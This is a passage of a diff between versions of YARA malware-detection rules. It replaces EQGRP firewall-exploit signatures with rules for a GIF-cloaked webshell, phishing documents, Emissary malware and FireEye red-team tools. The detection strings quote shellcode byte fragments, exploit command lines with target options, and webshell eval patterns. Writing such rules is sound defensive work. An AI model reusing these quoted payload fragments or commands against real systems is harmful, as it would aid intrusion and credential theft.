+		logic_hash = "9fba467cfbf8cad0c8e6cf1e1c7eacd8b0be869ebe6c5180f50f5cdefa8b5bb5"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f"
+		hash1 = "64f811b99eb4ae038c88c67ee0dc9b150445e68a2eb35ff1a0296533ae2edd71"
 
 	strings:
-		$s1 = "execute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00" ascii
-		$s2 = "tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00" ascii
-		$s3 = "auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07" ascii
-		$c1 = { e8 00 00 00 00 5d be ef be ad de 89 f7 89 ec 29 f4 b8 03 00 00 00 }
-		$c3 = { 31 c0 b0 03 31 db 89 e1 31 d2 b6 f0 b2 0d cd 80 3d ff ff ff ff 75 07 }
+		$s1 = "nps.exe -encodedcommand {base64_encoded_command}" fullword wide
+		$s2 = "c:\\Development\\ghps\\nps\\nps\\obj\\x86\\Release\\nps.pdb" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_EQGRP_EPBA : FILE
+rule SIGNATURE_BASE_Gifcloaked_Webshell_A : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file EPBA.script"
+		description = "Looks like a webshell cloaked as GIF"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5159c2f4-20b7-590d-b216-b3468c26e459"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L607-L626"
+		id = "4fdef65c-204a-5019-9b4f-c5877c3e39d4"
+		date = "2018-03-12"
+		modified = "2026-02-04"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/yara_mixed_ext_vars.yar#L176-L197"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c483efdcfbb0dd8602a552b519d3aa52fca12549c0ec1660d813a2a1da66c3a6"
-		score = 75
+		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+		logic_hash = "0c4570373d50c40745cd0523dcf8c34ee3cae1c298982b3a39d4a33e054aa779"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "53e1af1b410ace0934c152b5df717d8a5a8f5fdd8b9eb329a44d94c39b066ff7"
 
 	strings:
-		$x1 = "./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 " fullword ascii
-		$x2 = "-t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP" fullword ascii
-		$x3 = "./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP" fullword ascii
-		$x4 = "--target_vers=TARGET_VERS    target Pix version (pix712, asa804) (REQUIRED)" fullword ascii
-		$x5 = "-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port" fullword ascii
-		$x6 = "this operation is complete, BananaGlee will" fullword ascii
-		$x7 = "cd /current/bin/FW/BGXXXX/Install/LP" fullword ascii
+		$s0 = "input type"
+		$s1 = "<%eval request"
+		$s2 = "<%eval(Request.Item["
+		$s3 = "LANGUAGE='VBScript'"
+		$s4 = "$_REQUEST" fullword
+		$s5 = ";eval("
+		$s6 = "base64_decode"
+		$fp1 = "<form name=\"social_form\""
 
 	condition:
-		( uint16( 0 ) == 0x2023 and filesize < 7KB and 1 of ( $x* ) ) or ( 3 of them )
+		uint32( 0 ) == 0x38464947 and ( 1 of ( $s* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_EQGRP_BPIE : FILE
+rule SIGNATURE_BASE_Brooxml_Hunting : HUNTING FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BPIE-2201.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a73f0216-3994-5ee6-8a8c-cbcc1279898e"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L628-L648"
+		description = "Detects Microsoft OOXML files with prepended data/manipulated header"
+		author = "Proofpoint"
+		id = "1ffea1c7-9f97-5bb1-93d7-ce914765416f"
+		date = "2024-11-27"
+		modified = "2025-06-02"
+		reference = "https://x.com/threatinsight/status/1861817946508763480"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_brooxml_dec24.yar#L2-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ab13dde40015fba80f55bc9d1b82c94ec2421e9ea263b70ad8ec0a7a74c43c9a"
-		score = 75
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "697e80cf2595c85f7c931693946d295994c55da17a400f2c9674014f130b4688"
+		logic_hash = "8a8d934fe9286c9d1c83a2a0676bb8a5f2501116b96cca32dc27136ecfb9325b"
+		score = 70
+		quality = 85
+		tags = "HUNTING, FILE"
+		category = "hunting"
 
 	strings:
-		$s1 = "profProcessPacket" fullword ascii
-		$s2 = ".got_loader" fullword ascii
-		$s3 = "getTimeSlotCmdHandler" fullword ascii
-		$s4 = "getIpIpCmdHandler" fullword ascii
-		$s5 = "LOADED" fullword ascii
-		$s6 = "profStartScan" fullword ascii
-		$s7 = "tmpData.1" fullword ascii
-		$s8 = "resetCmdHandler" fullword ascii
+		$pk_ooxml_magic = {50 4b 03 04 [22] 13 00 [2] 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c}
+		$pk_0102 = {50 4b 01 02}
+		$pk_0304 = {50 4b 03 04}
+		$pk_0506 = {50 4b 05 06}
+		$pk_0708 = {50 4b 07 08}
+		$word = "word/"
+		$ole = {d0 cf 11 e0}
+		$tef = {78 9f 3e 22}
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 70KB and 6 of ( $s* ) )
+		$pk_ooxml_magic in ( 4 .. 16384 ) and $pk_0506 in ( 16384 .. filesize ) and #pk_0506 == 1 and #pk_0102 > 2 and #pk_0304 > 2 and $word and not ( $pk_0102 at 0 ) and not ( $pk_0304 at 0 ) and not ( $pk_0506 at 0 ) and not ( $pk_0708 at 0 ) and not ( $ole at 0 ) and not ( uint16( 0 ) == 0x5a4d ) and not ( $tef at 0 )
 }
-rule SIGNATURE_BASE_EQGRP_Jetplow_SH
+rule SIGNATURE_BASE_Brooxml_Phishing : PHISHING FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file jetplow.sh"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e7780540-29c9-5827-8ac0-a685d9ba8a5f"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L650-L666"
+		description = "Detects PDF and OOXML files leading to AiTM phishing"
+		author = "Proofpoint"
+		id = "ccd8ab30-90a4-5d4b-8a77-dbc4669bdb95"
+		date = "2024-11-27"
+		modified = "2025-06-02"
+		reference = "https://x.com/threatinsight/status/1861817946508763480"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_brooxml_dec24.yar#L41-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8ae203527c4e41ae169c63521bb08d5199c43dfd1028574a1791ab1f8f198105"
-		score = 75
+		logic_hash = "884e0b65c6c8b916ca9bc28705134ae02d1705c13cf43bff78f0c9ada894b307"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c"
+		tags = "PHISHING, FILE"
+		category = "phishing"
 
 	strings:
-		$s1 = "cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow" fullword ascii
-		$s2 = "***** Please place your UA in /current/bin/FW/OPS *****" fullword ascii
-		$s3 = "ln -s ../jp/orig_code.bin orig_code_pixGen.bin" fullword ascii
-		$s4 = "*****             Welcome to JetPlow              *****" fullword ascii
+		$hex1 = { 21 20 03 20 c3 be c3 bf 09 20 [0-1] 06 20 20 20 20 20 20 20 20 20 20 20 01 20 20 20 06 20 20 20 20 20 20 20 20 10 20 20 05 20 20 20 01 20 20 20 c3 be c3 bf c3 bf c3 bf }
 
 	condition:
-		1 of them
+		all of ( $hex* ) and ( ( uint16be( 0 ) == 0x504b ) or ( uint32be( 0 ) == 0x25504446 ) )
 }
-rule SIGNATURE_BASE_EQGRP_BBANJO : FILE
+rule SIGNATURE_BASE_Emissary_APT_Malware_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BBANJO-3011.exe"
+		description = "Detects Emissary Malware - from samples A08E81B411.DAT, ishelp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "81af4769-7007-51f1-9569-bc370618b4ff"
-		date = "2016-08-16"
+		id = "ae6ff471-9255-52a3-89d2-452eb2556184"
+		date = "2016-01-02"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L668-L687"
+		reference = "http://goo.gl/V0epcf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_emissary.yar#L8-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8ee2e817732674bf7ff5f396271a2a90da8f401d7ea0f0a3f51c21712adb3ea4"
+		logic_hash = "cab20ac0c17dcc5cb9d0c9f4cffe47e5880acd9dee935cb0eb1ef59579a23f17"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f09c2f90464781a08436321f6549d350ecef3d92b4f25b95518760f5d4c9b2c3"
+		hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab"
+		hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629"
+		hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290"
+		hash4 = "69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664"
+		hash5 = "675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc"
+		hash6 = "e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b"
+		hash7 = "a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8"
+		hash8 = "acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9"
+		hash9 = "e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d"
+		hash10 = "e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538"
+		hash11 = "29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051"
+		hash12 = "98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0"
+		hash13 = "fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb"
 
 	strings:
-		$s1 = "get_lsl_interfaces" fullword ascii
-		$s2 = "encryptFC4Payload" fullword ascii
-		$s3 = ".got_loader" fullword ascii
-		$s4 = "beacon_getconfig" fullword ascii
-		$s5 = "LOADED" fullword ascii
-		$s6 = "FormBeaconPacket" fullword ascii
-		$s7 = "beacon_reconfigure" fullword ascii
+		$s1 = "cmd.exe /c %s > %s" fullword ascii
+		$s2 = "execute cmd timeout." fullword ascii
+		$s3 = "rundll32.exe \"%s\",Setting" fullword ascii
+		$s4 = "DownloadFile - exception:%s." fullword ascii
+		$s5 = "CDllApp::InitInstance() - Evnet create successful." fullword ascii
+		$s6 = "UploadFile - EncryptBuffer Error" fullword ascii
+		$s7 = "WinDLL.dll" fullword wide
+		$s8 = "DownloadFile - exception:%s,code:0x%08x." fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" fullword ascii
+		$s10 = "CDllApp::InitInstance() - Evnet already exists." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and 3 of them
 }
-rule SIGNATURE_BASE_EQGRP_BPATROL_2201 : FILE
+rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_3_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BPATROL-2201.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "864a346c-e8aa-5c66-9867-faccb14b8bee"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L689-L706"
+		description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it."
+		author = "FireEye"
+		id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06"
+		date = "2020-12-08"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L47-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a2e9aa4627924c99dd3a342174855df3f0d545a67fd2293ca5601eeae70ae010"
+		hash = "995120b35db9d2f36d7d0ae0bfc9c10d"
+		logic_hash = "4fda951281b3d711e50c24f543b528b93295a119af39245b4bece77f641bbf2b"
 		score = 75
-		quality = 83
+		quality = 38
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aa892750b893033eed2fedb2f4d872f79421174eb217f0c34a933c424ae66395"
 
 	strings:
-		$s1 = "dumpConfig" fullword ascii
-		$s2 = "getstatusHandler" fullword ascii
-		$s3 = ".got_loader" fullword ascii
-		$s4 = "xtractdata" fullword ascii
-		$s5 = "KEEPGOING" fullword ascii
+		$dirty1 = "fireeye" ascii nocase wide
+		$dirty2 = "kulinacs" ascii nocase wide
+		$dirty3 = "RedFlare" ascii nocase wide
+		$dirty4 = "gorat" ascii nocase wide
+		$dirty5 = "flare" ascii nocase wide
+		$go1 = "go.buildid" ascii wide
+		$go2 = "Go build" ascii wide
+		$json1 = "json:\"pid\"" ascii wide
+		$json2 = "json:\"key\"" ascii wide
+		$json3 = "json:\"agent_time\"" ascii wide
+		$json4 = "json:\"rid\"" ascii wide
+		$json5 = "json:\"ports\"" ascii wide
+		$json6 = "json:\"agent_platform\"" ascii wide
+		$rat = "rat" ascii wide
+		$str1 = "handleCommand" ascii wide
+		$str2 = "sendBeacon" ascii wide
+		$str3 = "rat.AgentVersion" ascii wide
+		$str4 = "rat.Core" ascii wide
+		$str5 = "rat/log" ascii wide
+		$str6 = "rat/comms" ascii wide
+		$str7 = "rat/modules" ascii wide
+		$str8 = "murica" ascii wide
+		$str9 = "master secret" ascii wide
+		$str10 = "TaskID" ascii wide
+		$str11 = "rat.New" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and all of them )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000 and any of ( $dirty* )
 }
-rule SIGNATURE_BASE_EQGRP_Extrabacon
+rule SIGNATURE_BASE_Credtheft_MSIL_Adpasshunt_2_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "79b998ef-e548-5038-b8ad-da1abf362e7f"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L708-L725"
+		description = "No description has been set in the source file - Signature Base"
+		author = "FireEye"
+		id = "44ba09c3-ac0a-58e7-b98c-dedcbf208d00"
+		date = "2020-12-08"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L845-L861"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a010d5e6324715f8e1bf29e957c365fabd2986fece53aaea23bba8ee59bd808"
-		score = 75
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "a76faa34a1f9cc891aeaa65525c8698e49d5a141854ca0cffb42f06a251bea43"
+		score = 50
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735"
+		tags = "FILE"
 
 	strings:
-		$x1 = "To disable password checking on target:" fullword ascii
-		$x2 = "[-] target is running" fullword ascii
-		$x3 = "[-] problem importing version-specific shellcode from" fullword ascii
-		$x4 = "[+] importing version-specific shellcode" fullword ascii
-		$s5 = "[-] unsupported target version, abort" fullword ascii
+		$pdb1 = "\\ADPassHunt\\"
+		$pdb2 = "\\ADPassHunt.pdb"
+		$s1 = "Usage: .\\ADPassHunt.exe"
+		$s2 = "[ADA] Searching for accounts with msSFU30Password attribute"
+		$s3 = "[ADA] Searching for accounts with userpassword attribute"
+		$s4 = "[GPP] Searching for passwords now"
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or 2 of ( $s* )
 }
-rule SIGNATURE_BASE_EQGRP_Sploit_Py
+rule SIGNATURE_BASE_APT_Backdoor_Win_Gorat_Memory_1
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file sploit.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f403965-5fb1-55b2-bef6-65c18e08e58f"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L727-L742"
+		description = "Identifies GoRat malware in memory based on strings."
+		author = "FireEye"
+		id = "4fcdd98f-1873-58e1-a9f5-73ee0aa5a69f"
+		date = "2020-12-08"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1013-L1039"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "874eaffcbc191951db39ba6c85e8c80b83b0df8d33136b6cdcdefcb28e596474"
+		hash = "3b926b5762e13ceec7ac3a61e85c93bb"
+		logic_hash = "bf8d80b7a7d35c1bcb353ff66d10bc95c2e6502043acc6554887465a467cdcf7"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
 
 	strings:
-		$x1 = "the --spoof option requires 3 or 4 fields as follows redir_ip" ascii
-		$x2 = "[-] timeout waiting for response - target may have crashed" fullword ascii
-		$x3 = "[-] no response from health check - target may have crashed" fullword ascii
+		$rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
+		$rat2 = "rat.(*Core).generateBeacon" fullword
+		$rat3 = "rat.gJitter" fullword
+		$rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword
+		$rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword
+		$rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword
+		$rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword
+		$rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword
+		$rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
+		$rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword
+		$rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword
+		$winblows = "rat/platforms/win.(*winblows).GetStage" fullword
 
 	condition:
-		1 of them
+		$winblows or 3 of ( $rat* )
 }
-rule SIGNATURE_BASE_EQGRP_Uninstallpbd
+rule SIGNATURE_BASE_Hacktool_MSIL_Sharpivot_3_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file uninstallPBD.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0153cb2a-a0de-51f9-80c2-22136d56f16d"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L744-L759"
+		description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code."
+		author = "FireEye"
+		id = "956ba026-c2fa-55fd-be53-0cfaa345f27a"
+		date = "2020-12-08"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1145-L1174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51be8a491a1e228dfc6156a86e9f2ffc923c39d0649bbc031ea1bafe1af22a45"
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "f51ac9637f47a98beee1b3c37b594e292aab0e1d3f9e49c41b1f3c3ce02e17de"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "692fdb449f10057a114cf2963000f52ce118d9a40682194838006c66af159bd0"
+		tags = "FILE"
 
 	strings:
-		$s1 = "memset 00e9a05c 4 38845b88" fullword ascii
-		$s2 = "_hidecmd" ascii
-		$s3 = "memset 013abd04 1 0d" fullword ascii
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "SharPivot" ascii wide
+		$str2 = "ParseArgs" ascii wide
+		$str3 = "GenRandomString" ascii wide
+		$str4 = "ScheduledTaskExists" ascii wide
+		$str5 = "ServiceExists" ascii wide
+		$str6 = "lpPassword" ascii wide
+		$str7 = "execute" ascii wide
+		$str8 = "WinRM" ascii wide
+		$str9 = "SchtaskMod" ascii wide
+		$str10 = "PoisonHandler" ascii wide
+		$str11 = "SCShell" ascii wide
+		$str12 = "SchtaskMod" ascii wide
+		$str13 = "ServiceHijack" ascii wide
+		$str14 = "ServiceHijack" ascii wide
+		$str15 = "commandArg" ascii wide
+		$str16 = "payloadPath" ascii wide
+		$str17 = "Schtask" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
 }
-rule SIGNATURE_BASE_EQGRP_BICECREAM : FILE
+rule SIGNATURE_BASE_Hacktool_MSIL_SEATBELT_1_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BICECREAM-2140"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a10819ae-db48-5d30-8e2e-2e4fe33e005b"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L761-L782"
+		description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project."
+		author = "FireEye"
+		id = "cfd730ac-1eec-5e04-b871-c14912bc0425"
+		date = "2020-12-08"
+		modified = "2023-01-27"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1210-L1233"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "adaa6b7d4bf9e6f95fbae781382e72afc07993582473cbee7139a93df0fe3283"
+		hash = "848837b83865f3854801be1f25cb9f4d"
+		logic_hash = "89275ec08b75cef371b70fb749cbcada3f30309869094ab7940811fe40f8a008"
 		score = 75
-		quality = 85
+		quality = 67
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4842076af9ba49e6dfae21cf39847b4172c06a0bd3d2f1ca6f30622e14b77210"
 
 	strings:
-		$s1 = "Could not connect to target device: %s:%d. Please check IP address." fullword ascii
-		$s2 = "command data size is invalid for an exec cmd" fullword ascii
-		$s3 = "A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma" ascii
-		$s4 = "Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]" fullword ascii
-		$s5 = "Execute 0x%08x with args (%08x, %08x, %08x): [y/n]" fullword ascii
-		$s6 = "[%d] Execute code." fullword ascii
-		$s7 = "Execute 0x%08x with args (%08x): [y/n]" fullword ascii
-		$s8 = "dump_value_LHASH_DOALL_ARG" fullword ascii
-		$s9 = "Eggcode is complete. Pass execution to it? [y/n]" fullword ascii
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide
+		$str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide
+		$str3 = "LogonId=\"(\\d+)\"" ascii nocase wide
+		$str4 = "{0}.{1}.{2}.{3}" ascii nocase wide
+		$str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide
+		$str6 = "*[System/EventID={0}]" ascii nocase wide
+		$str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide
+		$str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide
+		$str10 = "{0,-23}" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them ) or ( 5 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
 }
-rule SIGNATURE_BASE_EQGRP_Create_Http_Injection : FILE
+rule SIGNATURE_BASE_APT_Builder_PY_REDFLARE_2_1
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file create_http_injection.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "92b6dad0-c7d8-5522-8fc1-fbd0aae00960"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L784-L802"
+		description = "No description has been set in the source file - Signature Base"
+		author = "FireEye"
+		id = "74c56ee1-734e-5fdb-beee-6345a5993f68"
+		date = "2020-12-01"
+		modified = "2020-12-01"
